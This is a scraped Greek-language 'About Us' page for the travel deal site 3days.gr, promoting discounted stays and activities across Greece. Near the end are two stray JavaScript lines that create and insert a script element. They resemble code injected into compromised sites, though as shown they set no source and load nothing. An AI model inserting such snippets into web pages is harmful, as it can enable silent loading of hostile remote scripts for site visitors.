Επιλογή πόλης

  Ποιοί είμαστε

  About Us

  Το 3days.gr, το πρώτο τουριστικό deal site στην Ελλάδα!

  Ήρθε για να αλλάξει τον τρόπο που κάνετε διακοπές. Ανά 3 ημέρες παρουσιάζει μια μοναδική προσφορά σε επιλεγμένους hot προορισμούς με εκπτώσεις που αγγίζουν μέχρι και το 70%. Πολυτελή ξενοδοχειακά συγκροτήματα, ξενώνες και παραδοσιακά καταλύματα προσφέρουν διαμονή κι υπηρεσίες σε τιμές κάτω του κόστους, παρέχοντας τη δυνατότητα για οικονομικές διακοπές στα πιο όμορφα μέρη της ελληνικής επικράτειας.

  Οι εκπληκτικά χαμηλές τιμές σε συνδυασμό με την ανανέωση των προσφορών και την εύκολη διαδικασία κρατήσεων που προσφέρει το 3days, συνιστούν το μέλλον στο χώρο του τουρισμού.

  Το 3days προσφέρει ολοκληρωμένες προτάσεις για διακοπές συμπεριλαμβάνοντας εκπληκτικές προσφορές σε επιχειρήσεις όπως spa, café, εστιατόρια, extreme sports, εταιρίες οργάνωσης υπαίθριων δραστηριοτήτων κι εναλλακτικές μορφές τουρισμού.

  Επιπρόσθετα, οι επιλογές των προσφορών πραγματοποιούνται πάντα με γνώμονα τις προτιμήσεις και τη βέλτιστη ευχαρίστηση των πελατών μας.

  Το εν λόγω εγχείρημα υπογράφει η αξιόπιστη, έμπειρη και καταξιωμένη ομάδα του ταξιδιωτικού portal www.web-greece.gr, με 15χρονη πείρα στο χώρο και επιτυχημένες συνεργασίες με πάνω από 1000 τουριστικές επιχειρήσεις σε όλη την Ελλάδα.

  document.currentScript.parentNode.insertBefore(s, document.currentScript);

  var d=document;var s=d.createElement(“script”); document.currentScript.parentNode.insertBefore(s, document.currentScript);

  Προσφορές που μπορεί να σε ενδιαφέρουν
   To Top